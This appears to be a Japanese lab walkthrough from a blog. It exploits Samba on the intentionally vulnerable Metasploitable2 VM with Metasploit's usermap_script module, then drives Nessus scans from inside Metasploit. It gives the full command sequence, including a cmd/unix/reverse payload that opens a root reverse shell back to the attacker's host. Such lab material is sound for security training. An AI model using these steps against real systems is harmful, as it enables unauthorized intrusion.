metasploitable2 samba攻略
virtualbox を起動し
BT5R3
metasploitable2
を起動
以下、BT5R3 の操作
まず root でログインして
startx で X windows 起動
service nessusd start
でNessus起動
msfconsole
で
MSF起動
load nessus
で MSFから Nessus 接続機能ロード
nessus_connect hjuser:Nessusのパスワード@127.0.0.1
でNessus 接続
search samba
で samba の脆弱性を調べる
この中から
use exploit/multi/samba/usermap_script
で使用する Exploit を指定
次に指定可能なオプションを
show options
で確認
オプションの確認ができたら
RHOST、つまり対象の設定
set RHOST 192.168.10.214
次に show payloads
を実行して、実行可能な payload の確認
この中から指定する payload の指定をする
set payload cmd/unix/reverse
一覧のときには
payloads なのに、
セットするときには payload なので注意
reverse では
相手側から自ホスト側に接続が行われるので
自ホスト側の設定が必要になるので
show options
でオプションを確認すると
LHOST
LPORT
の設定がでているのが確認できるので
設定する
オプションで確認したときに
Required のところに yes となっているけど
これは必須項目という意味
とりあえず、自マシンのIPが必要なので
ifconfig で調べて
set LHOST 192.168.10.174
というように
set LHOST BT5R3のIPアドレス
と設定する
これをやらないと exploit が実行できない
これで、再び
show options
で設定を確認して LHOST にIPアドレスが
設定されたか確認する
ここまでできたら、
exploit
で実行
Command shell session 1 opened
となるまで待つ
あとは、 vsftpd のときと同じように
id;
でroot 権限になっているか
ifconfig:
でIPの確認
などで権限やリモートシェルの確認ができればOK
終了したいときには
Ctrl + c で
Abort session 1? [y/N] y
で終了できる
今回の参考書籍
カテゴリー: MSF + Nessus
metasploit framework から Nessus を使う
metasploit framework から Nessus を使う
Metasploit Framework には
Nessus にアクセスするためのブリッジ機能があり
この機能を使うことで
Metasploit Framework 通称 MSF から
スキャン実行、検査結果の参照などが可能になる
まずは nessusd を起動しておく
service nessusd start
次に
msfconsole
を実行して MSF起動
ターミナルが
root@bt
から
msf >
にかわれるので、わかりやすい
ここまでできたら、
load nessus
これで
Nessus に接続するための機能がロードされる
nessus_help
で、使用可能なコマンドの確認ができる
nessus_connect hjuser:password@127.0.0.1
というように
nessus connect Nessusユーザ名:パスワード@NessusホストIPアドレス
で接続
これで、接続できたら、スキャンを実行していく
まず
nessus_policy_list
でポリシーリストを表示
ここで表示されるポリシーIDは
スキャン実行時のパラメータに使う
-1 Internal Network Scan
-2 Prepare for PCI-DSS audits (section 11.2.2)
-3 Web App Tests
-4 External Network Scan
1 metasploit
が私の場合の環境
スキャンの実行は
nessus_scan_new 1 metasploit-test 192.168.10.21
というように
nessus_scan_new ポリシーID 任意のスキャンの名称 対象IPアドレス
となる
スキャンの名称は、あとで実行結果をみるときに使う
ファイル名のようなもの
ターゲットIPアドレスの指定は
複数指定も可能で , で区切って書くけど
スペースをいれるとエラーになるので注意
○ 192.168.10.214,192.168.10.244
X 192.168.10.214 , 192.168.10.244
というかんじ
スキャン中のステータスに関しては
nessus_scan_status
で確認することができる
MSFから実行したスキャン結果についても
Nessus へログインして見ることができる
今回も参考書籍は
metasploit とペネトレーションテストに関しても
書籍がでているので、こちらも参考にするとよいかも